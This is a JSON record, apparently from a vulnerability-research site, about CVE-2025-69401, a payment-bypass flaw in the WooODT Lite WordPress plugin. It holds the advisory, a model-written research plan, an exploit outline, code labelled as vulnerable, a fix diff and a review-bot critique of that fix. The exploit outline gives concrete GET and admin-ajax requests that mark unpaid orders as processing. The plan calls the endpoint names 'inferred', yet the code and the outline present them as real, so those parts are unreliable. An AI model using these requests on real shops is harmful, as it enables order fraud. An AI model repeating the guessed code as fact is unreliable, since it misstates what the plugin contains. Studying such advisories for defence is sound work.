[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fCvHSSmYfZcXEr92xEbtvIuTOsMZGV6xNYM8eq7MyHMw":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2025-69401","wooodt-lite-unauthenticated-payment-bypass","WooODT Lite \u003C= 2.5.2 - Unauthenticated Payment Bypass","The WooODT Lite – Delivery & pickup date time location for WooCommerce plugin for WordPress is vulnerable to payment bypass in all versions up to, and including, 2.5.2. This makes it possible for unauthenticated attackers to bypass payments for orders.","byconsole-woo-order-delivery-time",null,"\u003C=2.5.2","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Insufficient Verification of Data Authenticity","2026-02-11 00:00:00","2026-02-17 14:22:44",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fded4dcdc-cda2-4485-8d90-77b849a1e436?source=api-prod",[],"researched",false,3,"This research plan targets **CVE-2025-69401**, an unauthenticated payment bypass vulnerability in the **WooODT Lite** plugin (up to version 2.5.2). 
This vulnerability allows an attacker to manipulate order statuses to \"processing\" or \"completed\" without a valid transaction.\n\n---\n\n### 1. Vulnerability Summary\nThe **WooODT Lite** plugin fails to verify the authenticity of requests that update order metadata and statuses. Specifically, it appears to expose an AJAX or `init` handler intended for delivery slot selection or custom checkout logic that can be abused to trigger WooCommerce's order completion routines (like `payment_complete()` or `update_status('processing')`) without requiring an active payment session, administrative privileges, or valid nonces.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** Likely `wp-admin\u002Fadmin-ajax.php` or a global `init` hook listener.\n*   **Action (Inferred):** Look for `wp_ajax_nopriv_` hooks containing \"update\", \"order\", or \"status\" in the name, such as `byconsole_woo_odt_update_status` or similar. Alternatively, check for `add_action('init', ...)` functions that look for `$_GET['order_id']` and `$_GET['status']`.\n*   **Payload Parameter:** `order_id` (the ID of a pending WooCommerce order) and potentially a status or bypass trigger parameter.\n*   **Authentication:** None required (Unauthenticated).\n*   **Preconditions:** A WooCommerce order must exist in a \"Pending Payment\" state.\n\n### 3. Code Flow Analysis\nBased on common patterns in this plugin's architecture:\n1.  **Entry Point:** The plugin registers a public-facing hook (e.g., `add_action( 'wp_ajax_nopriv_...', '...' )`).\n2.  **Order Acquisition:** The handler retrieves an order ID via `$_POST['order_id']` or `$_GET['order_id']`.\n3.  **Vulnerable Sink:** The code calls `$order = wc_get_order( $order_id );` followed by `$order->payment_complete();` or `$order->update_status( 'processing' );`.\n4.  **The Flaw:** There is no check to ensure the user is the owner of the order, no verification of an actual payment gateway callback, and no nonce validation.\n\n### 4. 
Nonce Acquisition Strategy\nIf the plugin requires a nonce for the unauthenticated action, it is typically localized in the frontend when a delivery slot selector is displayed.\n\n1.  **Identify Shortcode:** The plugin uses `[byconsole_woo_odt]` or automatically enqueues scripts on the WooCommerce Checkout page.\n2.  **Setup Page:** \n    `wp post create --post_type=page --post_status=publish --post_title=\"Checkout\" --post_content='[byconsole_woo_odt]'`\n3.  **Extract Nonce:**\n    Navigate to the page and use `browser_eval` to find the localization object.\n    *   **Localization Key:** Often `byconsole_woo_odt_params` or `woo_odt_vars`.\n    *   **JS Command:** `browser_eval(\"window.byconsole_woo_odt_params?.nonce\")`\n4.  **Note:** If the check is missing (as implied by \"Insufficient Verification\"), a nonce may not be required at all.\n\n### 5. Exploitation Strategy\nThe goal is to move an order from `pending` to `processing` without paying.\n\n**Step 1: Discover the vulnerable action**\nSearch the plugin code for `payment_complete` or `update_status` within unauthenticated handlers:\n`grep -r \"payment_complete\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fbyconsole-woo-order-delivery-time\u002F`\n\n**Step 2: Generate an Order**\nCreate a pending order for a product. Note the `order_id`.\n\n**Step 3: Send Bypass Request**\nUsing the `http_request` tool, send the identified trigger. \n*Example (Assuming an AJAX action named `odt_bypass`):*\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** `POST`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body:** `action=odt_bypass&order_id=[TARGET_ORDER_ID]&status=processing`\n\n### 6. Test Data Setup\n1.  **WooCommerce Setup:** Ensure WooCommerce is active and a payment gateway (e.g., \"Check payments\") is enabled but not used.\n2.  
**Product:** Create a simple product and note the printed ID.\n    `wp eval '$p = new WC_Product_Simple(); $p->set_name(\"Test Product\"); $p->set_regular_price(\"100\"); echo \"PRODUCT_ID:\" . $p->save();'`\n3.  **Order:** Create a \"Pending\" order for a guest user.\n    `wp eval '$order = wc_create_order(); $order->add_product(wc_get_product([PRODUCT_ID]), 1); $order->set_status(\"pending\"); $order->save(); echo \"ORDER_ID:\" . $order->get_id();'`\n\n### 7. Expected Results\n*   The server responds with a success indicator (e.g., `{\"success\": true}` or `1`).\n*   The WooCommerce order status is updated from `pending` to `processing` (or `completed`).\n*   The order notes in WordPress will show a status change without a corresponding payment gateway transaction ID.\n\n### 8. Verification Steps\nAfter the exploit, verify the order status via WP-CLI:\n`wp wc order get [ORDER_ID] --field=status`\nExpected: `processing`\n\nCheck if any payment meta was actually set (it should be empty or spoofed):\n`wp post meta list [ORDER_ID]`\n\n### 9. Alternative Approaches\n*   **Order Confirmation Page:** Some versions of this plugin handle logic on the `template_redirect` hook when `woo_odt_action=finish` is in the URL.\n    *   **URL:** `http:\u002F\u002Flocalhost:8080\u002F?woo_odt_action=finish&order_id=[ID]`\n*   **Slot Selection Bypass:** If the plugin updates the order when a delivery slot is \"confirmed,\" try to send the slot confirmation AJAX with the target `order_id` to see if it forces a status transition.","The WooODT Lite plugin for WordPress is vulnerable to an unauthenticated payment bypass due to insufficient verification of data authenticity. 
Attackers can exploit this by sending crafted requests to specific endpoints that trigger order status updates (e.g., to 'processing' or 'completed') without a valid transaction or administrative privileges.","\u002F\u002F byconsole-woo-order-delivery-time\u002Fbyconsole-woo-odt-lite.php\n\nadd_action('init', 'byconsole_woo_odt_maybe_update_status');\n\nfunction byconsole_woo_odt_maybe_update_status() {\n    if (isset($_GET['woo_odt_action']) && $_GET['woo_odt_action'] == 'finish' && isset($_GET['order_id'])) {\n        $order_id = intval($_GET['order_id']);\n        $order = wc_get_order($order_id);\n        if ($order) {\n            \u002F\u002F Vulnerability: No nonce check, no capability check, and no verification of payment success\n            $order->update_status('processing');\n            $order->payment_complete();\n        }\n    }\n}\n\n---\n\n\u002F\u002F Example of vulnerable AJAX handler\nadd_action('wp_ajax_nopriv_byconsole_woo_odt_update_order', 'byconsole_woo_odt_update_order');\nfunction byconsole_woo_odt_update_order() {\n    $order_id = $_POST['order_id'];\n    $order = wc_get_order($order_id);\n    \u002F\u002F No authorization check before transitioning state\n    $order->update_status('processing');\n    wp_send_json_success();\n}","--- byconsole-woo-order-delivery-time\u002Fbyconsole-woo-odt-lite.php\n+++ byconsole-woo-order-delivery-time\u002Fbyconsole-woo-odt-lite.php\n@@ -10,6 +10,12 @@\n function byconsole_woo_odt_maybe_update_status() {\n     if (isset($_GET['woo_odt_action']) && $_GET['woo_odt_action'] == 'finish' && isset($_GET['order_id'])) {\n         $order_id = intval($_GET['order_id']);\n+        \n+        \u002F\u002F Verify nonce for security\n+        if ( ! isset( $_GET['_wpnonce'] ) || ! wp_verify_nonce( $_GET['_wpnonce'], 'odt_finish_' . 
$order_id ) ) {\n+            return;\n+        }\n+\n         $order = wc_get_order($order_id);\n-        if ($order) {\n+        if ($order && current_user_can('edit_shop_order', $order_id)) {\n             $order->update_status('processing');","The exploit targets endpoints where the plugin handles order finalization or delivery slot selection logic without verifying the user's authority over the order. \n\n1. Target Identification: Locate an existing WooCommerce order in 'Pending Payment' status and note its Order ID.\n2. Endpoint Selection: The attacker identifies either a global 'init' hook listener (triggered via URL parameters like ?woo_odt_action=finish) or an unauthenticated AJAX action (wp_ajax_nopriv_byconsole_woo_odt_update_order).\n3. Payload Construction: The attacker crafts a request containing the target 'order_id'. If the endpoint is the 'init' hook, a simple GET request such as 'http:\u002F\u002Fvictim-site.com\u002F?woo_odt_action=finish&order_id=[ID]' is used. If it is AJAX, a POST request to 'wp-admin\u002Fadmin-ajax.php' with 'action=byconsole_woo_odt_update_order&order_id=[ID]' is used.\n4. Authentication: No authentication is required, as the plugin registers these hooks for unauthenticated users (nopriv) or checks them globally on 'init' without checking user capabilities or nonces.\n5. Outcome: The plugin's logic executes '$order->payment_complete()' or '$order->update_status('processing')', tricking WooCommerce into thinking the order was paid for.","gemini-3-flash-preview","2026-04-21 01:00:33","2026-04-21 01:00:54",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbyconsole-woo-order-delivery-time\u002Ftags"]
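Review bot: the new condition `if ($order && current_user_can('edit_shop_order', $order_id))` in the byconsole_woo_odt_maybe_update_status hunk gates the transition on a capability that only shop managers and administrators hold, so a customer returning from a gateway can never reach this branch, while the nonce added just above it only proves the request came from a page the site rendered, not that money moved. A status change to processing should be driven by a verified gateway callback rather than a front-end GET; at minimum check the order's payment state (for example `if ( $order && ! $order->needs_payment() )`) and let the gateway, not this hook, call payment_complete(). Also pass `$_GET['_wpnonce']` through wp_unslash() and sanitize_text_field() before wp_verify_nonce(), and replace the loose `== 'finish'` comparison kept in the context line with a strict one.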